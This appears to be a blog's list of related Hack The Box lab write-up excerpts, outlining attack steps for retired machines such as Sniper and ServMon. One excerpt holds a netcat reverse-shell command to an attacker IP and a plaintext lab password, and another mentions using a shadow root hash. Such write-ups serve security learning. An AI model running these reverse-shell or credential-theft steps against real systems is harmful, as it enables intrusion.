Similar Posts
Hackthebox ServMon writeup
Byadmin3.4 (5) Basic Information Difficulty-EasyType -WindowsPoints-20Maker-dmw0ngUser Blood- sampriti:08 mins, 06 seconds. Root Blood-sampriti:34 mins, 10 seconds. Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt…
HackTheBox Blunder Writeup
ByadminUse /etc/shadow root hash
Gmd…………C0
Hack the box Openadmin Writeup
ByadminHackthebox openadmin writeup
Hack the box(HTB) Sniper write up
Byadmin0 (0) Steps Nmap scan Finding RFI Setting up Samba server Getting reverse shell Privilege escalation(Getting user.txt) Basic enumeration Making malicious .chm file Getting the reverse shell(Getting root.txt) Commands used nmap -sC -sV -oV 10.10.10.151 nano /etc/samba/smb.conf service smbd start nc.exe 10.10.14.39 4444 -e cmd.exe powershell $username = ‘SNIPER\Chris’ $password = ’36mEAhz/B8xQ~2VM’ $securePassword = ConvertTo-SecureString…
Hack the box Nibbles write up
ByadminHack the box Nibbles write up
Hack the box Brainfuck writeup
Byadmin4.5 (13) Brief It is a retired machine from hack the box. It’s a linux insane machine . Steps involved 1-Port scanning2-Enumerating SSLcertificates3-Editing our host file4-Exploiting WP Support Plus5-Getting email password6-Getting creds for secret form7-Decoding Vigenere ciphers8-Decrypting the id_rsa keyprase9-Getting user.txt10-Decrypting the root.txt11-Getting root.txt Commands involved 1-nmap -sC -sV -O -v -oV 10.10.10.172-nano /etc/hosts3-wpscan –url…


It was very useful.
Glad to hear